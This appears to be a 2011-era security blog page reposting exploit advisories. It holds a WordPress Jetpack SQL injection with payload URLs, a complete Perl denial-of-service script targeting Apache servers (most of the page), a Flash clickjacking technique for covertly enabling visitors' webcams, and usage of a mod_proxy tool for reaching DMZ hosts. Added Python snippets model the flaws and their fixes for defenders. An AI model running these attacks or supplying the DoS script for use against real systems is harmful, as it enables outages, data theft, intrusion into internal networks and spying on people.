Showing posts with label vulnerability. Show all posts

Application Security and Bug Free Coding - The Infographic

Secure Coding and Software Security
Infographic by Veracode Application Security

Wordpress Jetpack Plugin Vulnerable to SQL Injection

Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP

Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com. A SQL injection vulnerability was found in this plugin by longrifle0x.
File: wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
Exploitation:
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None'LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][MID((VERSION()),1,6)
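The bug class in the advisory above, as an added example (this is not the plugin's code): a stand-in SQLite table, a lookup that interpolates the `id` GET parameter into the query text, and the same lookup with integer validation and a bound parameter. The table, column names and payloads are constructed for the demo.

```python
import sqlite3

def build_db():
    """Constructed stand-in for a plugin table; not the Jetpack schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE shares (id INTEGER PRIMARY KEY, service TEXT, owner TEXT)")
    db.executemany("INSERT INTO shares VALUES (?, ?, ?)",
                   [(1, "twitter", "alice"), (2, "facebook", "bob"), (3, "email", "carol")])
    return db

def lookup_vulnerable(db, raw_id):
    """Interpolates the untrusted GET parameter straight into the SQL text, so the
    database parses whatever the client sent (the bug class in the advisory)."""
    sql = f"SELECT id, service, owner FROM shares WHERE id = {raw_id}"
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    """Rejects anything that is not an integer, then binds the value, so attacker
    text never reaches the SQL parser."""
    try:
        share_id = int(raw_id)
    except ValueError:
        return []
    return db.execute("SELECT id, service, owner FROM shares WHERE id = ?",
                      (share_id,)).fetchall()

# Boolean probes shaped like the CASE WHEN payload above: against the vulnerable
# lookup the row count leaks one bit (is the condition true?) per request.
PROBE_TRUE = "-1 OR (SELECT CASE WHEN sqlite_version() LIKE '3%' THEN 1 ELSE 0 END)"
PROBE_FALSE = "-1 OR (SELECT CASE WHEN sqlite_version() LIKE '9%' THEN 1 ELSE 0 END)"

if __name__ == "__main__":
    db = build_db()
    for payload in ("2", "-1 OR 1=1", PROBE_TRUE, PROBE_FALSE):
        print(repr(payload), "vulnerable ->", len(lookup_vulnerable(db, payload)),
              "rows; safe ->", len(lookup_safe(db, payload)), "rows")
```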

Via - 1337day

Apache Server 2.3.14 Denial of Service Exploit

A security vulnerability has been found in the latest version of Apache Server, 2.3.14. It was discovered by Egyptian hacker/exploit writer Xen0n, who wrote a Perl exploit that lets anyone exploit it.

#!/usr/bin/perl -w
# Exploit Title: Apache Server 2.3.14 <= Denial of Service exploit (DDOS)
# Date: 22/10/2011
# Author: Xen0n
# Software Link: http://www.apache.org/dyn/closer.cgi
# Version: 2.3.14 and older
# Tested on: CentOs
#feel free to contact us xenon.sec@gmail.com
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
ooooooo ooooo .oooo.
`8888 d8' d8P'`Y8b
Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo.
`8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b
.8PY888. 888ooo888 888 888 888 888 888 888
d8' `888b 888 .o 888 888 `88b d88' 888 888
o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o
Welcome to Xen0n Apache Attacker
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,);
if ($version) {
print "Version 1.0\n";
exit;
}
unless ($host) {
print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";
print "\n\temail: xenon.sec@ gmail.com\n";
print "\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Xen0n will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($xenon) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "1", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "Testing $host could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now just wait...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Xen0n closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Xen0n against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
print
"Attacking $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
# 1337day.com [2011-10-22]
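The script above holds each connection open by sending request headers without the terminating blank line, then one throw-away header every `-timeout` seconds. This added Python model (not Apache code and not the exploit) replays that traffic shape against the rule that mod_reqtimeout's `RequestReadTimeout header=20-40,MinRate=500` enforces, so a defender can see why a header-read deadline ends the attack; the header bytes and timings are constructed.

```python
import math

def slow_client_events(period, rounds):
    """Constructed traffic shaped like the script above: request line and headers with no
    terminating blank line, then one throw-away header every `period` seconds."""
    primary = (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
               b"User-Agent: Mozilla/4.0 (compatible)\r\nContent-Length: 42\r\n")
    events = [(0.0, primary)]
    events += [(float(period * i), b"X-a: b\r\n") for i in range(1, rounds + 1)]
    return events

def header_read_outcome(events, header_min=20, header_max=40, min_rate=500):
    """Apply the documented RequestReadTimeout header=MIN-MAX,MinRate=RATE rule to one
    connection: allow MIN seconds for the headers, extend the deadline by one second per
    RATE bytes received, never beyond MAX. header_min=None models a server with no
    header-read timeout. Returns ("complete"|"dropped"|"held", seconds since connect)."""
    buf = b""
    deadline = math.inf if header_min is None else float(header_min)
    for t, chunk in events:
        if t > deadline:
            return ("dropped", deadline)
        buf += chunk
        if b"\r\n\r\n" in buf:
            return ("complete", t)   # headers finished in time; request proceeds
        if header_min is not None:
            deadline = min(float(header_max), deadline + len(chunk) / min_rate)
    return ("held", events[-1][0])  # still open after the last byte we modelled

if __name__ == "__main__":
    attack = slow_client_events(period=100, rounds=3)   # the script's default -timeout
    normal = [(0.0, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n")]
    print("no timeout, slow client :", header_read_outcome(attack, header_min=None))
    print("mod_reqtimeout, slow    :", header_read_outcome(attack))
    print("mod_reqtimeout, normal  :", header_read_outcome(normal))
```

Even a client that trickles a header every 10 seconds is dropped shortly after the 20-second minimum, because eight bytes per round buys it only 16 milliseconds of extra deadline.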

Adobe Flash Bug | Spy On The Webcams of Your Website Visitors

A slight variation of a previously designed clickjacking attack that used an Adobe Flash vulnerability has once again made it possible for website administrators to surreptitiously spy on their visitors by turning on the user's webcam and microphone.
It works in all versions of Adobe Flash that the researcher has tested. He has confirmed that it works in Firefox and Safari for Mac; use one of those if you check out the live demo. There is a weird CSS opacity bug in most other browsers (Chrome for Mac and most browsers on Windows/Linux).
Clickjacking + Adobe Flash = Sad Times!
This attack works by using a neat variation of the normal clickjacking technique that spammers and other bad people are using in the wild right now. For the uninitiated:
Combine clickjacking with the Adobe Flash Player Settings Manager page and you have a recipe for some sad times.

How the attack works

Instead of iframing the whole settings page (which contains the framebusting code), just iframe the settings SWF file. This bypasses the framebusting JavaScript code, since we don't load the whole page — just the remote .SWF file. I was really surprised to find out that this actually works!
There have been a bunch of clickjacking attacks in the wild, but never any where the attacker iframes a SWF file from a remote domain to clickjack it, let alone a .SWF file as important as the one that controls access to your webcam and mic!
The problem here is the Flash Player Settings Manager; this inheritance from Macromedia might be Flash Player's security Achilles' heel.
This is a screenshot of what the Settings Manager .SWF file looks like:

Adobe Flash Settings Manager



Apache mod_proxy Proof of Concept (CVE-2011-3368)

A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network:

Description
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.

SECFORCE has developed a proof of concept for this vulnerability. The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, thereby bypassing any firewall. Click here to download the POC.

Usage:
rmacros@laptop2: python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos
http://www.secforce.co.uk
usage():
python apache_scan.py [options]
 [options]
    -r: Remote Apache host
    -p: Remote Apache port (default is 80)
    -u: URL on the remote web server (default is /)
    -d: Host in the DMZ (default is 127.0.0.1)
    -e: Port in the DMZ (enables 'single port scan')
    -g: GET request to the host in the DMZ (default is /)
    -h: Help page
examples:
 - Port scan of the remote host
    python apache_scan.py -r www.example.com -u /img/test.gif
 - Port scan of a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
 -d internalhost.local
- Retrieve a resource from a host in the DMZ
    python apache_scan.py -r www.example.com -u /img/test.gif
 -d internalhost.local -e 80 -g /accounts/index.html
The following screenshot shows the result of the command above:
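To see what the description above means in practice, this added Python check (not SECFORCE's tool and not Apache code) models a `RewriteRule ... [P]` or `ProxyPassMatch` substitution and reports which host the resulting URL names; `backend.internal.example` and `intranet.example` are placeholder names. The audit function flags rules whose pattern does not pin the request URI to a leading slash, which is what lets an `@` in the request reach the authority part of the proxied URL.

```python
import re
from urllib.parse import urlsplit

def proxy_target(rule_pattern, target_template, request_uri):
    """Model a reverse-proxy rewrite: match the request URI against the rule's pattern,
    substitute $1.. into the target, and return (host the proxy would connect to, url).
    Returns None when the rule does not match the request."""
    m = re.match(rule_pattern, request_uri)
    if not m:
        return None
    url = re.sub(r"\$(\d)", lambda g: m.group(int(g.group(1))), target_template)
    # urlsplit applies the URI grammar: text before '@' is userinfo, the real host follows.
    return urlsplit(url).hostname, url

def rewrite_rule_is_safe(rule_pattern, target_template):
    """Audit rule: either the pattern requires the URI to start with '/', or the target
    keeps a '/' between its host and the substitution, so client-supplied text can never
    land in the authority part of the proxied URL."""
    anchored = rule_pattern.startswith("^/")
    slash_after_host = re.match(r"https?://[^/$]+/", target_template) is not None
    return anchored or slash_after_host

# Constructed rules: the first has the shape the CVE description names, the second is fixed.
VULNERABLE_RULE = (r"^(.*)", "http://backend.internal.example$1")
FIXED_RULE = (r"^/(.*)", "http://backend.internal.example/$1")

if __name__ == "__main__":
    for uri in ("/img/test.gif", "@intranet.example:8080/accounts/index.html"):
        for name, rule in (("vulnerable", VULNERABLE_RULE), ("fixed", FIXED_RULE)):
            print(f"{name:10} {uri!r:50} -> {proxy_target(*rule, uri)}")
    print("vulnerable rule passes audit:", rewrite_rule_is_safe(*VULNERABLE_RULE))
    print("fixed rule passes audit:", rewrite_rule_is_safe(*FIXED_RULE))
```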

MSN.Com Vulnerable to XSS

TeamDX discovered an XSS vulnerability in MSN.com. The vulnerable link is here. XSS is a computer security vulnerability that lets attackers inject client-side script into web pages viewed by other users.

The C7 Crew found New XSS Vulnerability on Sony PlayStation

The C7 crew found a new XSS vulnerability on Sony PlayStation. That means Sony is still not safe. Why can't they spend some bucks to fix all these bugs? Sony was hacked more than 20 times last month, and this shows that Sony is still not secure and is hackable.

Link to Vulnerable Page.